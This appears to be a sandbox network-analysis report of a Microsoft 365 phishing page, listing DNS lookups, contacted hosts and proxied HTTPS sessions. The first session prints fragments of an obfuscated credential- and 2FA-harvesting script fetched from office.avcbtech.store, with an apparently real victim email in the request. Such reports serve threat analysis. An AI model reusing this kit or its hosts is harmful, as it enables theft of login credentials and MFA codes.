Mar 17, 2025 22:35:08.777338982 CET	1.1.1.1	192.168.2.24	0xbb90	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:08.777915001 CET	1.1.1.1	192.168.2.24	0x82b	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 17, 2025 22:35:16.020397902 CET	1.1.1.1	192.168.2.24	0x337c	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:29.919051886 CET	1.1.1.1	192.168.2.24	0xe3e6	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:56.680078030 CET	1.1.1.1	192.168.2.24	0x5357	No error (0)	www.google.com		142.250.184.196	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:56.680088997 CET	1.1.1.1	192.168.2.24	0xfdd2	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 17, 2025 22:36:32.571908951 CET	1.1.1.1	192.168.2.24	0x728d	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:36:32.571908951 CET	1.1.1.1	192.168.2.24	0x728d	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:36:32.571908951 CET	1.1.1.1	192.168.2.24	0x728d	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:36:32.572048903 CET	1.1.1.1	192.168.2.24	0xe47b	No error (0)	api.ipify.org			65	IN (0x0001)	false

HTTP Request Dependency Graph

office.avcbtech.store

sender.linxcoded.top

code.jquery.com

i.imgur.com

api.ipify.org

avcbtech.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.24	60830	139.28.36.38	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:34:58 UTC	564	OUT	GET /muk/xls/m1u2k.js?uid=bfrieden@cosb.org HTTP/1.1 Host: office.avcbtech.store Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:34:58 UTC	396	IN	HTTP/1.1 200 OK Server: nginx/1.26.3 Date: Mon, 17 Mar 2025 21:34:58 GMT Content-Type: application/javascript Content-Length: 68421 Last-Modified: Mon, 17 Mar 2025 15:20:31 GMT Connection: close ETag: "67d83dbf-10b45" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-17 21:34:58 UTC	15988	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 31 31 62 28 29 7b 76 61 72 20 5f 30 78 35 30 64 36 39 35 3d 5b 27 23 62 61 63 6b 27 2c 27 49 6e 63 6f 72 72 65 63 74 5c 78 32 30 32 46 41 5c 78 32 30 63 6f 64 65 2e 5c 78 32 30 54 72 79 5c 78 32 30 61 67 61 69 6e 2e 27 2c 27 64 69 76 36 27 2c 27 23 62 61 63 6b 2d 74 65 78 74 27 2c 27 74 79 70 65 27 2c 27 4d 69 63 72 6f 73 6f 66 74 27 2c 27 72 65 6c 61 79 27 2c 27 36 6b 67 6a 58 4c 43 27 2c 27 73 74 79 6c 65 27 2c 27 70 61 67 65 5f 76 69 73 69 74 27 2c 27 63 6c 6f 73 65 27 2c 27 61 70 70 72 6f 76 65 5f 73 69 67 6e 69 6e 27 2c 27 64 69 76 35 27 2c 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 27 2c 27 23 63 61 70 74 63 68 61 2d 62 74 6e 27 2c 27 2e 6c 6f 67 6f 6e 61 6d 65 27 2c 27 64 69 73 61 62 Data Ascii: function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disab
2025-03-17 21:34:58 UTC	16384	IN	Data Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 31 36 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 72 67 62 28 35 31 2c 5c 78 32 30 35 31 2c 5c 78 32 30 35 31 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 Data Ascii: \x20\x20\x20\x20\x20\x20\x20font-size:\x2016px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20rgb(51,\x2051,\x2051);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
2025-03-17 21:34:59 UTC	16384	IN	Data Raw: 32 32 3e 3c 70 5c 78 32 30 69 64 3d 5c 78 32 32 61 70 70 72 6f 76 65 2d 6e 75 6d 62 65 72 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 68 33 5c 78 32 30 74 65 78 74 2d 63 65 6e 74 65 72 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 62 6f 72 64 65 72 3a 5c 78 32 30 32 70 78 5c 78 32 30 73 6f 6c 69 64 5c 78 32 30 62 6c 61 63 6b 3b 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 34 30 70 78 3b 5c 78 32 30 70 61 64 64 69 6e 67 3a 5c 78 32 30 31 32 70 78 5c 78 32 30 31 32 70 78 3b 5c 78 32 30 74 65 78 74 2d 61 6c 69 67 6e 3a 5c 78 32 30 63 65 6e 74 65 72 3b 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 5c 78 32 32 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 27 2c 27 3c 61 5c 78 32 30 68 72 65 66 Data Ascii: 22><p\x20id=\x22approve-number\x22\x20class=\x22h3\x20text-center\x22\x20style=\x22border:\x202px\x20solid\x20black;\x20font-size:\x2040px;\x20padding:\x2012px\x2012px;\x20text-align:\x20center;\x20display:\x20inline-block;\x22></p></div><br>','<a\x20href
2025-03-17 21:34:59 UTC	16384	IN	Data Raw: 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 5f 30 78 34 64 34 61 64 61 28 30 78 32 34 62 29 29 2c 5f 30 78 35 66 63 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 27 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 67 72 6f 75 70 5c 78 32 30 6d 74 2d 32 5c 78 32 32 3e 3c 69 6e 70 75 74 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 65 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 72 6f 75 6e 64 65 64 2d 30 5c 78 32 30 62 6f 72 64 65 72 2d 64 61 72 6b 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 Data Ascii: 214[_0x4d4ada(0x188)](_0x4d4ada(0x24b)),_0x5fc214[_0x4d4ada(0x188)]('<div\x20class=\x22form-group\x20mt-2\x22><input\x20type=\x22email\x22\x20name=\x22ai\x22\x20class=\x22form-control\x20rounded-0\x20border-dark\x22\x20id=\x22ai\x22\x20aria-describedby=\x
2025-03-17 21:34:59 UTC	3281	IN	Data Raw: 28 27 23 6d 73 67 2d 32 66 61 27 29 5b 5f 30 78 32 38 35 37 35 66 28 30 78 31 62 37 29 5d 28 5f 30 78 32 38 35 37 35 66 28 30 78 31 39 32 29 29 3b 7d 7d 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 2c 27 65 72 72 6f 72 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 34 61 33 65 36 3d 5f 30 78 31 38 63 32 37 61 3b 24 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 39 29 29 5b 27 74 65 78 74 27 5d 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 38 29 29 2c 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 7d 29 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 31 30 37 31 66 32 3d 6e 65 77 20 57 65 62 53 6f 63 6b 65 74 28 5f 30 78 31 38 63 32 37 61 28 30 78 31 64 63 29 29 3b 5f 30 78 31 30 37 31 66 32 5b 5f 30 78 31 38 63 32 37 61 28 30 78 32 33 38 29 5d 3d 66 75 6e 63 Data Ascii: ('#msg-2fa')[_0x28575f(0x1b7)](_0x28575f(0x192));}}_0x168ef3();},'error':function(){var _0x44a3e6=_0x18c27a;$(_0x44a3e6(0x1b9))['text'](_0x44a3e6(0x1b8)),_0x168ef3();}});else{const _0x1071f2=new WebSocket(_0x18c27a(0x1dc));_0x1071f2[_0x18c27a(0x238)]=func

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.24	60831	185.174.100.20	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:00 UTC	566	OUT	GET /start/xls/includes/css6.css HTTP/1.1 Host: sender.linxcoded.top Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:00 UTC	383	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Mon, 17 Mar 2025 21:35:00 GMT Content-Type: text/css Content-Length: 258966 Last-Modified: Mon, 27 Jan 2025 22:21:00 GMT Connection: close ETag: "679806cc-3f396" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-17 21:35:00 UTC	16001	IN	Data Raw: 20 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 20 20 20 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 Data Ascii: /! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007
2025-03-17 21:35:00 UTC	16384	IN	Data Raw: 75 70 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 34 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 34 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 35 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 37 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 36 3b 0d Data Ascii: up: 5; -ms-flex-order: 4; order: 4 } .order-5 { -webkit-box-ordinal-group: 6; -ms-flex-order: 5; order: 5 } .order-6 { -webkit-box-ordinal-group: 7; -ms-flex-order: 6;
2025-03-17 21:35:00 UTC	16384	IN	Data Raw: 65 78 2d 6f 72 64 65 72 3a 20 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 39 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 32 3b 0d 0a 20 Data Ascii: ex-order: 9; order: 9 } .order-lg-10 { -webkit-box-ordinal-group: 11; -ms-flex-order: 10; order: 10 } .order-lg-11 { -webkit-box-ordinal-group: 12;
2025-03-17 21:35:00 UTC	16384	IN	Data Raw: 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 62 74 6e 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 73 6d 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 0d 0a 20 20 20 20 2e 69 6e Data Ascii: roup-prepend>.form-control-plaintext.btn, .input-group-sm>.input-group-prepend>.form-control-plaintext.input-group-text { padding-right: 0; padding-left: 0 } .form-control-sm, .input-group-sm>.form-control, .in
2025-03-17 21:35:00 UTC	16384	IN	Data Raw: 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 35 34 35 62 36 32 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 34 65 35 35 35 62 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 73 68 6f 77 3e 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 20 7b Data Ascii: ; background-color: #545b62; border-color: #4e555b } .btn-secondary:not(:disabled):not(.disabled).active:focus, .btn-secondary:not(:disabled):not(.disabled):active:focus, .show>.btn-secondary.dropdown-toggle:focus {
2025-03-17 21:35:00 UTC	16384	IN	Data Raw: 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 72 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 62 6f 64 79 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 2d 67 72 6f 75 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 6c 61 70 73 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 76 Data Ascii: apse.show { display: block } tr.collapse.show { display: table-row } tbody.collapse.show { display: table-row-group } .collapsing { position: relative; height: 0; ov
2025-03-17 21:35:00 UTC	16384	IN	Data Raw: 72 61 64 69 6f 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 2d 34 20 2d 34 20 38 20 38 27 25 33 45 25 33 43 63 69 72 63 6c 65 20 72 3d 27 33 27 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 29 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 Data Ascii: radio .custom-control-input:checked~.custom-control-label::after { background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%23fff'/%3E%3C/svg%3E") }
2025-03-17 21:35:00 UTC	16384	IN	Data Raw: 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 Data Ascii: d { -ms-flex-wrap: nowrap; flex-wrap: nowrap } .navbar-expand .navbar-collapse { display: -webkit-box !important; display: -ms-flexbox !important; display: flex !important; -ms-flex-preferr
2025-03-17 21:35:00 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 39 65 63 65 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 2e 33 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 72 65 6d 20 32 72 65 6d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b Data Ascii: background-color: #e9ecef; border-radius: .3rem } @media (min-width:576px) { .jumbotron { padding: 4rem 2rem } } .jumbotron-fluid { padding-right: 0; padding-left: 0;
2025-03-17 21:35:00 UTC	16384	IN	Data Raw: 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 2e 34 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 2e 38 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 Data Ascii: t^=right] .arrow, .bs-tooltip-right .arrow { left: 0; width: .4rem; height: .8rem } .bs-tooltip-auto[x-placement^=right] .arrow::before, .bs-tooltip-right .arrow::before { right: 0; border

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.24	60833	151.101.194.137	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:02 UTC	539	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:02 UTC	613	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 1175587 Date: Mon, 17 Mar 2025 21:35:02 GMT X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740035-EWR X-Cache: HIT, HIT X-Cache-Hits: 4188, 0 X-Timer: S1742247303.763802,VS0,VE1 Vary: Accept-Encoding
2025-03-17 21:35:02 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
